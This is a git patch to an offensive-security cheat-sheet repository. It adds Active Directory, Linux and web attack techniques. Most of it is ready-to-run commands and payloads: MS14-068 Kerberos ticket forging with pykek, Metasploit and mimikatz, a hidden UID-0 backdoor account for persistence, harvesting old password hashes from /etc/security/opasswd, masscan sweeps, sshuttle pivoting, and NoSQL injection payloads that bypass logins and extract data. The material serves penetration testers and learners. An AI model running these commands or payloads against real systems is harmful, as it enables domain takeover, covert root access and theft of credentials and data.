From 144b3827ab19b409dd4a425812bc13ec37330d8b Mon Sep 17 00:00:00 2001 From: Swissky Date: Sat, 29 Jun 2019 17:55:13 +0200 Subject: [PATCH] MS14-068 + /etc/security/opasswd --- .../Active Directory Attack.md | 69 ++++++++++++++++--- .../Linux - Persistence.md | 1 + .../Linux - Privilege Escalation.md | 11 ++- .../Network Discovery.md | 3 + .../Network Pivoting Techniques.md | 8 +++ NoSQL Injection/README.md | 29 ++++++-- Server Side Request Forgery/README.md | 4 +- 7 files changed, 108 insertions(+), 17 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 7c6bb5c..0ee416d 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -101,23 +101,73 @@ ### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability) -```bash -Exploit Python: https://www.exploit-db.com/exploits/35474/ -Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 -Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum +This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine. -git clone https://github.com/bidord/pykek +```powershell +# remote +rpcclient $> lookupnames john.smith +john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1) + +# loc +wmic useraccount get name,sid +Administrator S-1-5-21-3415849876-833628785-5197346142-500 +Guest S-1-5-21-3415849876-833628785-5197346142-501 +Administrator S-1-5-21-297520375-2634728305-5197346142-500 +Guest S-1-5-21-297520375-2634728305-5197346142-501 +krbtgt S-1-5-21-297520375-2634728305-5197346142-502 +lambda S-1-5-21-297520375-2634728305-5197346142-1110 +``` + +```bash +Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 +``` + +Generate a ticket with `metasploit` or `pykek` + +```powershell +Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum + Name Current Setting Required Description + ---- --------------- -------- ----------- + DOMAIN LABDOMAIN.LOCAL yes The Domain (upper case) Ex: DEMO.LOCAL + PASSWORD P@ssw0rd yes The Domain User password + RHOSTS 10.10.10.10 yes The target address range or CIDR identifier + RPORT 88 yes The target port + Timeout 10 yes The TCP timeout to establish connection and read data + USER lambda yes The Domain User + USER_SID S-1-5-21-297520375-2634728305-5197346142-1106 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000 +``` + +```powershell +# https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek +git clone https://github.com/SecWiki/windows-kernel-exploits python ./ms14-068.py -u @ -s -d -p python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org +python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10 +``` + +Then use `mimikatz` to load the ticket. + +```powershell mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" ``` +:warning: If the clock is skewed use `clock-skew.nse` script from `nmap` + +```powershell +$ nmap -sV -sC 10.10.10.10 +clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s + +$ sudo date -s "14 APR 2015 18:25:16" +``` + + ### Open Shares ```powershell -smbmap -H 10.10.10.100 # null session -smbmap -H 10.10.10.100 -R # recursive listing -smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 +smbmap -H 10.10.10.10 # null session +smbmap -H 10.10.10.10 -R # recursive listing +smbmap -H 10.10.10.10 -u invaliduser # guest smb session +smbmap -H 10.10.10.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 ``` or @@ -653,4 +703,5 @@ Most of the time the best passwords to spray are : * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) * [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) * [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) -* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/) \ No newline at end of file +* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/) +* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index 45ec556..567987b 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md @@ -29,6 +29,7 @@ ncat --tcp -lvp 4242 ```powershell sudo useradd -ou 0 -g 0 john sudo passwd john +echo "linuxpassword" | passwd --stdin john ``` ## Suid Binary diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index f46d0ea..f017fae 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -15,6 +15,7 @@ * [Checklist](#checklist) * [Looting for passwords](#looting-for-passwords) * [Files containing passwords](#files-containing-passwords) + * [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd) * [Last edited files](#last-edited-files) * [In memory passwords](#in-memory-passwords) * [Find sensitive files](#find-sensitive-files) @@ -133,6 +134,13 @@ grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \; ``` +### Old passwords in /etc/security/opasswd + +The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them. + +:warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes + + ### Last edited files Files that were edited in the last 10 minutes @@ -614,4 +622,5 @@ https://www.exploit-db.com/exploits/18411 - [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) - [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) -- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) \ No newline at end of file +- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) +* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) \ No newline at end of file diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md index 1a0b976..ab07f1a 100644 --- a/Methodology and Resources/Network Discovery.md +++ b/Methodology and Resources/Network Discovery.md @@ -102,6 +102,9 @@ List Nmap scripts : ls /usr/share/nmap/scripts/ ```powershell masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 + +masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp +masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst ``` ## Reconnoitre diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index a1be0ec..95e9974 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -138,7 +138,15 @@ route flush ## sshuttle +Transparent proxy server that works as a poor man's VPN. Forwards over ssh. + +* Doesn't require admin. +* Works with Linux and MacOS. +* Supports DNS tunneling. + ```powershell +pacman -Sy sshuttle +apt-get install sshuttle sshuttle -vvr user@10.10.10.10 10.1.1.0/24 sshuttle -vvr username@pivot_host 10.2.2.0/24 ``` diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index 130f735..3714a3f 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -1,9 +1,28 @@ # NoSQL injection -NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax. +> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax. + +## Summary + +* [Tools](#tools) +* [Exploit](exploits) + * [Authentication Bypass](#authentication-bypass) + * [Extract length information](#extract-length-information) + * [Extract data information](#extract-data-information) +* [Blind NoSQL](#blind-nosql) + * [POST with JSON body](#post-with-json-body) + * [GET](#get) +* [MongoDB Payloads](#mongodb-payloads) +* [References](#references) + +## Tools + +* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) ## Exploit +### Authentication Bypass + Basic authentication bypass using not equal ($ne) or greater ($gt) ```json @@ -17,14 +36,14 @@ in JSON {"username": {"$gt":""}, "password": {"$gt":""}} ``` -Extract length information +### Extract length information ```json username[$ne]=toto&password[$regex]=.{1} username[$ne]=toto&password[$regex]=.{3} ``` -Extract data information +### Extract data information ```json in URL @@ -124,5 +143,5 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi * [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/) * [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection) -* [cr0hn - NoSQL injection wordlists](https://github.com/cr0hn/nosqlinjection_wordlists) -* [Zanon - NoSQL Injection in MongoDB](https://zanon.io/posts/nosql-injection-in-mongodb) +* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists) +* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 70bb50c..facf5a3 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -217,7 +217,7 @@ http://127.1.1.1:80:\@@127.2.2.2:80/ http://127.1.1.1:80#\@127.2.2.2:80/ ``` -![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20Injection/Images/WeakParser.jpg) +![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_Parser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true) ## SSRF exploitation via URL Scheme @@ -243,7 +243,7 @@ ssrf.php?url=http://127.0.0.1:80 ssrf.php?url=http://127.0.0.1:443 ``` -![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20Injection/Images/SSRF_stream.png) +![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_stream.png?raw=true) The following URL scheme can be used to probe the network